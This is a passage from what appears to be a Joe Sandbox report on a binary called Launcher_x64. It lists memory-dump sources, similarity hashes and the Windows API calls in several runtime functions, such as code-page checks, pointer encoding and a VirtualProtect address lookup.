                                                                                          • Source File: 00000002.00000002.1667870663.0000000000D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                                                                                          • Associated: 00000002.00000002.1667854268.0000000000D60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.1667894228.0000000000D86000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.1667909512.0000000000D90000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.1667925289.0000000000D94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.1667940223.0000000000D97000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_2_2_d60000_Launcher_x64.jbxd
                                                                                          Similarity
                                                                                          • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                                                                                          • String ID:
                                                                                          • API String ID: 2933794660-0
                                                                                          • Opcode ID: faf9d3ccbc6641f872816f5800288b781c42454cafc434d674908ef3bbe879db
                                                                                          • Instruction ID: bbf00d3dda957a98ff7d7e86c21c8e63d493014f009d73c495d5503a4446a4c7
                                                                                          • Opcode Fuzzy Hash: faf9d3ccbc6641f872816f5800288b781c42454cafc434d674908ef3bbe879db
                                                                                          • Instruction Fuzzy Hash: 94F06774D1020DEBCB00EBB4D94999EBBF4FF1D204B514995E412E7210E730A7449F51
                                                                                          APIs
                                                                                            • Part of subcall function 00D7594A: GetLastError.KERNEL32(00000000,?,00D77CCD), ref: 00D7594E
                                                                                            • Part of subcall function 00D7594A: SetLastError.KERNEL32(00000000,?,?,00000028,00D71F93), ref: 00D759F0
                                                                                          • GetACP.KERNEL32(-00000002,00000000,?,00000000,00000000,?,00D6F809,?,?,?,00000055,?,-00000050,?,?,?), ref: 00D7A1E5
                                                                                          • IsValidCodePage.KERNEL32(00000000,-00000002,00000000,?,00000000,00000000,?,00D6F809,?,?,?,00000055,?,-00000050,?,?), ref: 00D7A21C
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.1667870663.0000000000D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                                                                                          • Associated: 00000002.00000002.1667854268.0000000000D60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.1667894228.0000000000D86000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.1667909512.0000000000D90000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.1667925289.0000000000D94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.1667940223.0000000000D97000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_2_2_d60000_Launcher_x64.jbxd
                                                                                          Similarity
                                                                                          • API ID: ErrorLast$CodePageValid
                                                                                          • String ID: utf8
                                                                                          • API String ID: 943130320-905460609
                                                                                          • Opcode ID: a116b71e8fe4b5fff891a44014fb931d777c88096c36ffc4a42583c2ac4f491c
                                                                                          • Instruction ID: 45e9dde6864d156daa931f39507cda29745fcfc84825e2ad5fb95e333a7672ee
                                                                                          • Opcode Fuzzy Hash: a116b71e8fe4b5fff891a44014fb931d777c88096c36ffc4a42583c2ac4f491c
                                                                                          • Instruction Fuzzy Hash: 0851D771600705AAE725AFB8CC42BBE73A8EF85711F58842AF94D97181F670ED408B77
                                                                                          APIs
                                                                                          • EncodePointer.KERNEL32(00000000,00000000,00000000,?,?,?,?,?,?,00D75071,?,?,00000000,00000000,00000000,?), ref: 00D75195
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.1667870663.0000000000D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                                                                                          • Associated: 00000002.00000002.1667854268.0000000000D60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.1667894228.0000000000D86000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.1667909512.0000000000D90000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.1667925289.0000000000D94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.1667940223.0000000000D97000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_2_2_d60000_Launcher_x64.jbxd
                                                                                          Similarity
                                                                                          • API ID: EncodePointer
                                                                                          • String ID: MOC$RCC
                                                                                          • API String ID: 2118026453-2084237596
                                                                                          • Opcode ID: 0fec9516253b5116a0742f4f54cc233897fe926708235a6ae1ca10f8eec6740d
                                                                                          • Instruction ID: b2b1ce5d5b8987740502310ad79eea20e904598d273e9f3bc3b8aa4d257547ae
                                                                                          • Opcode Fuzzy Hash: 0fec9516253b5116a0742f4f54cc233897fe926708235a6ae1ca10f8eec6740d
                                                                                          • Instruction Fuzzy Hash: DF41AC31900609EFCF15CF98DC81AEEBBB5FF08304F188199F90867216E3B1A950DB66
                                                                                          APIs
                                                                                          • ___except_validate_context_record.LIBVCRUNTIME ref: 00D74C53
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.1667870663.0000000000D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                                                                                          • Associated: 00000002.00000002.1667854268.0000000000D60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.1667894228.0000000000D86000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.1667909512.0000000000D90000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.1667925289.0000000000D94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.1667940223.0000000000D97000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_2_2_d60000_Launcher_x64.jbxd
                                                                                          Similarity
                                                                                          • API ID: ___except_validate_context_record
                                                                                          • String ID: csm$csm
                                                                                          • API String ID: 3493665558-3733052814
                                                                                          • Opcode ID: 829149afb84b4b40d40af062cf2d3c96ac86b07a01a29663beb594334454e875
                                                                                          • Instruction ID: b1b73bbb8a89f5abeca551d8b4f9a146d04717acd18eae032022585d67f9b0e0
                                                                                          • Opcode Fuzzy Hash: 829149afb84b4b40d40af062cf2d3c96ac86b07a01a29663beb594334454e875
                                                                                          • Instruction Fuzzy Hash: 2531B032501218EBCF379F58C8459AA7B66FF09315B19C65AFC9C4A121E332CCA1DBB1
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.1667870663.0000000000D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                                                                                          • Associated: 00000002.00000002.1667854268.0000000000D60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.1667894228.0000000000D86000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.1667909512.0000000000D90000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.1667925289.0000000000D94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.1667940223.0000000000D97000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_2_2_d60000_Launcher_x64.jbxd
                                                                                          Similarity
                                                                                          • API ID: AddressProc
                                                                                          • String ID: @$VirtualProtect
                                                                                          • API String ID: 190572456-29487290
                                                                                          • Opcode ID: 3fd6a0ec314ff19c5aeb65eeb08b8845c8a38c7ed2ab61ad3e9edb41d613fcb1
                                                                                          • Instruction ID: 6d1644b195d191c98dce675188c1a3f6ab76d7e3ff1b16903b4e9541f81cf72f
                                                                                          • Opcode Fuzzy Hash: 3fd6a0ec314ff19c5aeb65eeb08b8845c8a38c7ed2ab61ad3e9edb41d613fcb1
                                                                                          • Instruction Fuzzy Hash: 2F41D1B4905309DFDB04DFA9E99869EBBF0FF48318F10841AE858AB350D7759984CFA1